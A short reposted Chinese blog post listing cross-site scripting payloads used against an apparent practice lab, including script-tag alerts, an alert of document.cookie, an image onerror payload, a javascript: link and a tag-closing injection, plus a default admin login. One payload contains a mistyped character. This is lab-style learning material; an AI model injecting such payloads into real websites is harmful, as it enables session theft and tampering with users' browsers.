关于xss的我也是一知半解,所以只放出payload来。
修改maxlength属性之后提交如下内容:
<script>alert(/xss/);</script>登录之后提交如下内容:
<script>alert(document.cookie);</script>提交如下内容:
<script>alert(/xss/);</script>提交如下内容,鼠标点击a标签时就会弹窗。
#' οnclick=alert(/xss/)>在xss_blind.php提交如下内容:
<script>alert(/xss/);</script>然后进入后台admin_login.php,admin,123456登录
进入后台就会弹窗。
提交如下内容就会弹窗:
<img src=# onerror=alert(/xss/)>提交如下内容,点击a标签就会弹窗:
javascript:alert(/xss/)提交如下内容闭合script标签即可弹窗:
</script><script>alert(/xss/)</script>版权说明 : 本文为转载文章, 版权归原作者所有 版权申明
原文链接 : https://blog.csdn.net/weixin_49125123/article/details/123948873
内容来源于网络,如有侵权,请联系作者删除!